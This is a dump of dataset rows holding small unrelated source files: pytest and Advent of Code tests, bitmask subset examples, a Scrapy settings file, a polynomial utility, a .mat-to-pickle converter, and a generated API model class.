] | staleyh@gmail.com |
8a9acded12be8b653aa5df5f824ffced7e8b7321 | 9a7a7e43902b6bc5a9e96933da8814acf3f318a3 | /Demo_Pytest/test_case/test_case2/test_demo1.py | 16ff01ee52ffb99c288240934acec7c8936d1bd5 | [] | no_license | liuchangfu/python_script | 9684d512f4bb09f37585e3fc56329be2ea8d6eb5 | 73f0e71364fc2271626e0deff54b4079ad92390c | refs/heads/master | 2020-03-15T16:05:47.624545 | 2018-06-08T10:44:17 | 2018-06-08T10:44:17 | 132,226,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | import pytest
def func(x):
    """Return x incremented by one."""
    result = x + 1
    return result
def test_func1():
    # Passes: func increments its argument, so func(3) == 4.
    assert func(3) == 4
def test_func2():
    # NOTE(review): this assertion fails (func(3) is 4, not 3); it looks
    # like a deliberate failing case for demonstrating pytest output.
    assert func(3) == 3
def test_func3():
    # Passes: func(3) is 4, which differs from 2.
    assert func(3) != 2
if __name__ == '__main__':
pytest.main() | [
"shift_1220@163.com"
] | shift_1220@163.com |
be9534885c37fcd145ac76851d1034085cff3e71 | 282d0a84b45b12359b96bbf0b1d7ca9ee0cb5d19 | /Malware1/venv/Lib/site-packages/numpy/core/tests/test_overrides.py | d7809428f80a8bd0c97c84402be95d52b083fb73 | [] | no_license | sameerakhtar/CyberSecurity | 9cfe58df98495eac6e4e2708e34e70b7e4c055d3 | 594973df27b4e1a43f8faba0140ce7d6c6618f93 | refs/heads/master | 2022-12-11T11:53:40.875462 | 2020-09-07T23:13:22 | 2020-09-07T23:13:22 | 293,598,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a916bc00e3819de8d2e997d6eef3f783e8e2a05748c01049de162b3d95f2ee4b
size 13196
| [
"46763165+sameerakhtar@users.noreply.github.com"
] | 46763165+sameerakhtar@users.noreply.github.com |
d9ed2fd3233c96c9b3ace22bf68412e6cc5af7a6 | 60618d48e09a140926d97b01cb9b6f76fcc65703 | /others/Card/cards_main.py | be2e8585610bcbc712cae5e93d806cbde9aa1693 | [] | no_license | Incipe-win/Python | ca8f36cc8785eb13512f71a3cf10149d4e1b855e | 5bab36b90591c74dedb6ead3484a279b90a1bcbd | refs/heads/master | 2021-01-07T08:11:42.293541 | 2020-12-06T09:17:02 | 2020-12-06T09:17:02 | 241,629,236 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | #! /usr/bin/python3
from Card import cards_tools
while True:
cards_tools.show_menu()
choose = input("请输入您的选择:")
if choose in ["1", "2", "3"]:
# 1. 新增名片
if choose == "1":
print("您的选择是: %s" % cards_tools.action[int(choose)])
cards_tools.new_card()
# 2. 显示全部
elif choose == "2":
print("您的选择是: %s" % cards_tools.action[int(choose)])
cards_tools.show_all()
# 3. 查询名片
elif choose == "3":
print("您的选择是: %s" % cards_tools.action[int(choose)])
cards_tools.search_card()
elif choose == "0":
print("您的选择是: %s" % cards_tools.action[int(choose)])
print("欢迎您的使用,祝您生活愉快!")
break
else:
print("输入错误,请重新输入!", end="\n\n")
continue
| [
"whc_9_13@163.com"
] | whc_9_13@163.com |
353c1f2652ec393eed4ab2a925dfb5c730c2ffa6 | 88a2f57b7d660228ca1ac922f0f582910bcacb3d | /algorithm/day03/부분집합.py | 4009ee3e894b07da049d639b1bab33c87493d2b5 | [] | no_license | chelseashin/TIL | adc5ed0bd4ba084e85b74baa9699096a7af5585e | 376b56844985b3ff43b94fa18086a449e6deac69 | refs/heads/master | 2022-12-10T02:13:39.680936 | 2020-11-19T13:18:30 | 2020-11-19T13:18:30 | 162,103,813 | 2 | 0 | null | 2022-12-08T04:53:38 | 2018-12-17T09:11:23 | Jupyter Notebook | UTF-8 | Python | false | false | 954 | py | # 부분집합
# Demo 1: enumerate all subsets of a 4-element set as bit vectors.
bit = [0,0,0,0]
for i in range(2):
    bit[0] = i
    for j in range(2):
        bit[1] = j
        for k in range(2):
            bit[2] = k
            for m in range(2):
                bit[3] = m
                print(bit)

# Demo 2: enumerate subsets of arr via bitmask.
arr = [1, 2, 3]
n = len(arr)

for i in range(1 << n):   # 1 << n is the number of subsets
    for j in range(n):    # compare one bit per element
        if i & (1 << j):  # if bit j of i is set, print element j
            print(arr[j], end = ', ')
    print()
print()

# Demo 3: Subset Sum -- count (and print) the non-empty subsets of arr
# whose elements add up to 0.
arr = [-7, -3, -2, 5, 8]
# Bug fix: the accumulator was named "sum", shadowing the builtin.
subset_sum = 0
cnt = 0

for i in range(1, 1 << len(arr)):
    subset_sum = 0
    for j in range(len(arr)):
        if i & (1 << j):
            subset_sum += arr[j]
    if subset_sum == 0:
        cnt += 1
        for j in range(len(arr)):
            if i & (1 << j):
                print(arr[j], end =" ")
        print()
print("개수 : {}".format(cnt))
"chaewonshin95@gmail.com"
] | chaewonshin95@gmail.com |
c52109bbe3a17f7efa023a3985d47abef966079d | faefc32258e04fa8ed404f129c6e635345ad2cd7 | /permute_data.py | fb109475cc5fbbf6730cacd3d23a3be2cbe057f5 | [] | no_license | lodhaz/Poisson-Equation-Solving-with-DL | 1c1e309abb186c5b081a4ebae83d3652884dd831 | 38dbc2e7334d71d7c3120a5d2f7452b82d904cef | refs/heads/master | 2020-04-06T15:07:17.232859 | 2018-10-26T07:23:19 | 2018-10-26T07:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py | # coding: utf-8
# Author: Zhongyang Zhang
# Email : mirakuruyoo@gmail.com
import h5py
import numpy as np
import pickle
# Convert MATLAB .mat datasets into pickled (X, y) sample pairs.
root = '/Volumes/Takanashi/Datasets_Repo/POISSON/'#'./TempData/'
DATA_PATH = [root + 'train_data_2.mat', root + 'test_data_2.mat']

# NOTE(review): the h5py handles are left open on purpose -- the datasets
# are read lazily by the transposes below; closing earlier would break them.
train_data = h5py.File(DATA_PATH[0], 'r')
test_data = h5py.File(DATA_PATH[1], 'r')

# Keep only the input/target datasets from each file.
train_data = dict((key, value) for key, value in train_data.items() if key == 'X_2_train' or key == 'Y_train')
test_data = dict((key, value) for key, value in test_data.items() if key == 'X_2_test' or key == 'Y_test')

# Reverse the axis order (MATLAB stores arrays column-major, so h5py sees
# the axes reversed -- presumably ending with samples first; TODO confirm
# the exact dimension meanings against the .mat files).
train_data_X = np.transpose(train_data['X_2_train'], (3, 2, 1, 0))
train_data_Y = np.transpose(train_data['Y_train'], (2, 1, 0))
test_data_X = np.transpose(test_data['X_2_test'], (3, 2, 1, 0))
test_data_Y = np.transpose(test_data['Y_test'], (2, 1, 0))

# Pair each sample with its flattened (column-major) target vector.
train_pairs = [(x, y.T.reshape(-1)) for x, y in zip(train_data_X, train_data_Y)]
test_pairs = [(x, y.T.reshape(-1)) for x, y in zip(test_data_X, test_data_Y)]

# Bug fix: the original passed open(...) directly to pickle.dump and never
# closed the handles; use context managers so files are flushed and closed.
with open(root + 'train_data_2.pkl', 'wb+') as f:
    pickle.dump(train_pairs, f)
with open(root + 'test_data_2.pkl', 'wb+') as f:
    pickle.dump(test_pairs, f)
| [
"786671043@qq.com"
] | 786671043@qq.com |
f5ff2eeb847505f1ee2df77fa7520501b178d23c | d55f8836d27dcbe56ce62623f1a69f33c0fd950d | /UpWork_Projects/andy_upwork/familyDollar/familyDollar/settings.py | 6582f744414d292a2be638e7fd1276830914c363 | [
"MIT"
] | permissive | SurendraTamang/Web-Scrapping | f12f0f8fcb4b6186ecab38c8036181e4d1560bed | 2bb60cce9010b4b68f5c11bf295940832bb5df50 | refs/heads/master | 2022-11-11T10:32:31.405058 | 2020-06-17T19:34:33 | 2020-06-17T19:34:33 | 273,258,179 | 0 | 1 | null | 2020-06-18T14:20:43 | 2020-06-18T14:20:42 | null | UTF-8 | Python | false | false | 3,387 | py | # -*- coding: utf-8 -*-
# Scrapy settings for familyDollar project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'Googlebot'
SPIDER_MODULES = ['familyDollar.spiders']
NEWSPIDER_MODULE = 'familyDollar.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36'
# Obey robots.txt rules
# NOTE(review): robots.txt directives are deliberately ignored; confirm the
# target site's terms of service permit crawling before deploying.
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
#   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#   'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
#    'familyDollar.middlewares.FamilydollarSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# Route requests through scrapy-selenium (priority 800) so pages are fetched
# by a real browser instead of Scrapy's default HTTP downloader.
DOWNLOADER_MIDDLEWARES = {
    'scrapy_selenium.SeleniumMiddleware': 800,
}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
#    'familyDollar.pipelines.FamilydollarPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
# scrapy-selenium driver configuration.
SELENIUM_DRIVER_NAME = 'chrome'
# Path to the chromedriver binary, relative to where scrapy is launched.
# NOTE(review): despite the "_windows" suffix the path has no .exe extension --
# verify it matches the actual driver filename on disk.
SELENIUM_DRIVER_EXECUTABLE_PATH = "../chromedriver_windows"
#SELENIUM_DRIVER_ARGUMENTS=['--headless']
# Empty argument list runs the browser with a visible window; switch to the
# '--headless' line above for server/CI use.
SELENIUM_DRIVER_ARGUMENTS=[]
# Write exported feeds as UTF-8 instead of escaped ASCII.
FEED_EXPORT_ENCODING = 'utf-8'
"p.byom26@gmail.com"
] | p.byom26@gmail.com |
acc5ce91a9ee2aafef0938a2e4fb9c066bef1e06 | 795df757ef84073c3adaf552d5f4b79fcb111bad | /r8lib/roots_to_r8poly.py | 74d2b4ce32f489ed8923d11cdc132ba501f2d69d | [] | no_license | tnakaicode/jburkardt-python | 02cb2f9ba817abf158fc93203eb17bf1cb3a5008 | 1a63f7664e47d6b81c07f2261b44f472adc4274d | refs/heads/master | 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,112 | py | #! /usr/bin/env python
#
def roots_to_r8poly ( n, x ):

#*****************************************************************************80
#
## ROOTS_TO_R8POLY converts polynomial roots to polynomial coefficients.
#
#  Discussion:
#
#    The result is monic, C(N) = 1, with
#    sum ( 0 <= I <= N ) C(I) * X^I = product ( K ) ( X - X(K) ).
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    16 April 2005
#
#  Author:
#
#    John Burkardt
#
#  Parameters:
#
#    Input, integer N, the number of roots specified.
#
#    Input, real X(N), the roots.  Any array-like shape is accepted,
#    including the N x 1 column vector used by ROOTS_TO_R8POLY_TEST;
#    the values are flattened internally.
#
#    Output, real C(1:N+1), the coefficients of the polynomial.
#
  import numpy as np
#
#  Flatten the roots.  Indexing a column vector yields size-1 arrays, and
#  assigning those into scalar slots of C relies on deprecated NumPy
#  behavior; flattening keeps the indexing scalar.
#
  x = np.asarray ( x ).ravel ( )
#
#  Initialize C to (0, 0, ..., 0, 1).
#  Essentially, we are setting up a divided difference table.
#
  c = np.zeros ( n + 1 )
  c[n] = 1.0
#
#  Convert to standard polynomial form by shifting the abscissas
#  of the divided difference table to 0.
#
  for j in range ( 1, n + 1 ):
    for i in range ( 1, n + 2 - j ):
      c[n-i] = c[n-i] - x[n+1-i-j] * c[n-i+1]

  return c
def roots_to_r8poly_test ( ):

#*****************************************************************************80
#
## ROOTS_TO_R8POLY_TEST tests ROOTS_TO_R8POLY.
#
#  Discussion:
#
#    Supplies five real roots (as a column vector) and prints both the
#    roots and the monic polynomial built from them.
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    11 March 2015
#
#  Author:
#
#    John Burkardt
#
  import numpy as np
  import platform
  from r8poly_print import r8poly_print
  from r8vec_print import r8vec_print

  n = 5
#
#  The roots, stored as an N x 1 column vector.
#
  x = np.array ( [ 1.0, -4.0, 3.0, 0.0, 3.0 ] ).reshape ( n, 1 )

  banner = [ \
    '', \
    'ROOTS_TO_R8POLY_TEST', \
    '  Python version: %s' % ( platform.python_version ( ) ), \
    '  ROOTS_TO_R8POLY is given N real roots,', \
    '  and constructs the coefficient vector', \
    '  of the corresponding polynomial.' ]
  for line in banner:
    print ( line )

  r8vec_print ( n, x, '  N real roots:' )

  c = roots_to_r8poly ( n, x )

  r8poly_print ( n, c, '  The polynomial:' )
#
#  Terminate.
#
  print ( '' )
  print ( 'ROOTS_TO_R8POLY_TEST:' )
  print ( '  Normal end of execution.' )
  return
if ( __name__ == '__main__' ):
  # When run as a script, bracket the demonstration with timestamps.
  # NOTE(review): `timestamp` is a sibling module of this project, not stdlib.
  from timestamp import timestamp
  timestamp ( )
  roots_to_r8poly_test ( )
  timestamp ( )
| [
"tnakaicode@gmail.com"
] | tnakaicode@gmail.com |
c0d6f7df93ff44f22b0fbc7c4c22a28f199d0a8d | bc2a96e8b529b0c750f6bc1d0424300af9743904 | /acapy_client/models/v10_present_proof_module_response.py | 9f0dd0cbcdc952d714e52ad3c2b8f6a7160c032a | [
"Apache-2.0"
] | permissive | TimoGlastra/acapy-client | d091fd67c97a57f2b3462353459780281de51281 | d92ef607ba2ff1152ec15429f2edb20976991424 | refs/heads/main | 2023-06-29T22:45:07.541728 | 2021-08-03T15:54:48 | 2021-08-03T15:54:48 | 396,015,854 | 1 | 0 | Apache-2.0 | 2021-08-14T13:22:28 | 2021-08-14T13:22:27 | null | UTF-8 | Python | false | false | 1,247 | py | from typing import Any, Dict, List, Type, TypeVar
import attr
T = TypeVar("T", bound="V10PresentProofModuleResponse")
@attr.s(auto_attribs=True)
class V10PresentProofModuleResponse:
    """Empty API response model; unknown payload keys are kept verbatim in
    ``additional_properties`` and exposed through a dict-like interface."""

    # Extra JSON properties not covered by the (empty) schema.
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a plain dict (a shallow copy of the extra properties)."""
        return dict(self.additional_properties)

    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Build an instance, stashing every key of ``src_dict`` as an extra property."""
        instance = cls()
        instance.additional_properties = src_dict.copy()
        return instance

    @property
    def additional_keys(self) -> List[str]:
        """Names of all extra properties currently held."""
        return list(self.additional_properties)

    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]

    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value

    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]

    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
| [
"dbluhm@pm.me"
] | dbluhm@pm.me |
194adeed213f29512491a64c1fe37a13dc9a9895 | a35ffe5fd1d4fe8cb68fe8807c80aa7fec219271 | /6. hafta - open_cv_devam/9_kirmizi_pikselleri_yok_etme.py | ccf49a746ef679a6d0ea1fd3ad436d8d2a9ae1e1 | [] | no_license | huseyin1701/goruntu_isleme | 2a3580ee970265094cd73d5b238676c57013f192 | d4a42cb35be175ac5549611858fc2b42d0eaafc6 | refs/heads/master | 2023-04-23T23:13:38.378867 | 2021-05-10T12:48:07 | 2021-05-10T12:48:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import cv2 as cv
# Load the image (OpenCV returns it as a BGR array).
resim = cv.imread("resim/manzara.jpg")

# cv.imread returns None instead of raising when the file is missing or
# unreadable; fail with a clear message rather than an AttributeError below.
if resim is None:
    raise FileNotFoundError("resim/manzara.jpg could not be read")

print(resim.shape)
print(resim[0, 0])

# In BGR order, channel index 2 is red.  A single vectorized slice
# assignment zeroes the whole channel -- identical result to the original
# per-pixel Python loop, but it runs at C speed.
resim[:, :, 2] = 0

cv.imshow("a", resim)
cv.waitKey(0)
"huseyingunes@gmail.com"
] | huseyingunes@gmail.com |
850295881c10098324f479559b5f35013e9d233c | b1bbfe2fa31d761d6a4658b022d344b5a0cb7dd8 | /2-add_two_numbers.py | 36e1dca017b8827f1873a0a36de3dad133a8f487 | [] | no_license | stevestar888/leetcode-problems | f5917efc3516f8e40d5143b4dc10583c1e22dabd | 844f502da4d6fb9cd69cf0a1ef71da3385a4d2b4 | refs/heads/master | 2022-11-12T05:01:02.794246 | 2022-10-28T16:45:48 | 2022-10-28T16:45:48 | 248,663,356 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,117 | py | """
https://leetcode.com/problems/add-two-numbers/
A few tricky cases:
[5]
[5]
[0]
[0]
"""
class Solution(object):
    def addTwoNumbers(self, l1, l2):
        """
        Sum two non-negative integers stored as linked lists of digits in
        least-significant-first order, returning the sum in the same form.

        :type l1: ListNode
        :type l2: ListNode
        :rtype: ListNode
        """
        dummy = ListNode(0)  # sentinel: avoids special-casing the head node
        tail = dummy
        carry = 0
        # Keep consuming while either list has digits or a carry remains;
        # the carry term handles cases like [5] + [5] -> [0, 1].
        while l1 or l2 or carry:
            total = carry
            if l1:
                total += l1.val
                l1 = l1.next
            if l2:
                total += l2.val
                l2 = l2.next
            # total is at most 9 + 9 + 1, so carry is 0 or 1.
            carry, digit = divmod(total, 10)
            tail.next = ListNode(digit)
            tail = tail.next
        return dummy.next
| [
"noreply@github.com"
] | stevestar888.noreply@github.com |
dbc091ff7c675c3e6c98899dae3ee66141845480 | a39ed5db6c75c9ae1f5e05118794c64102dc5f7a | /2022/15_2/solution_test.py | c8b8d15b3ece0d0f33d2976457bdc0fe9d8b446a | [
"MIT"
] | permissive | budavariam/advent_of_code | b656d5caf5d05113b82357754eb225e61e89ac0d | 635be485ec691f9c0cdeb83f944de190f51c1ba3 | refs/heads/master | 2022-12-25T18:12:00.981365 | 2022-12-20T08:20:51 | 2022-12-20T08:20:51 | 114,570,426 | 1 | 1 | MIT | 2022-12-09T09:29:06 | 2017-12-17T21:36:00 | Python | UTF-8 | Python | false | false | 1,143 | py | """ Advent of code 2022 day 15 / 2 """
import unittest
from solution import solution
class MyTest(unittest.TestCase):
    """Unit tests for day 15, part 2."""

    def test_basic(self):
        """Check the worked example from the puzzle description (search span 0..20)."""
        puzzle_input = """Sensor at x=2, y=18: closest beacon is at x=-2, y=15
Sensor at x=9, y=16: closest beacon is at x=10, y=16
Sensor at x=13, y=2: closest beacon is at x=15, y=3
Sensor at x=12, y=14: closest beacon is at x=10, y=16
Sensor at x=10, y=20: closest beacon is at x=10, y=16
Sensor at x=14, y=17: closest beacon is at x=10, y=16
Sensor at x=8, y=7: closest beacon is at x=2, y=10
Sensor at x=2, y=0: closest beacon is at x=2, y=10
Sensor at x=0, y=11: closest beacon is at x=2, y=10
Sensor at x=20, y=14: closest beacon is at x=25, y=17
Sensor at x=17, y=20: closest beacon is at x=21, y=22
Sensor at x=16, y=7: closest beacon is at x=15, y=3
Sensor at x=14, y=3: closest beacon is at x=15, y=3
Sensor at x=20, y=1: closest beacon is at x=15, y=3"""
        expected = 56000011
        self.assertEqual(solution(puzzle_input, 20), expected)
# Allow running this test module directly with `python <file>.py`.
if __name__ == "__main__":
    unittest.main()
| [
"budavariam@gmail.com"
] | budavariam@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.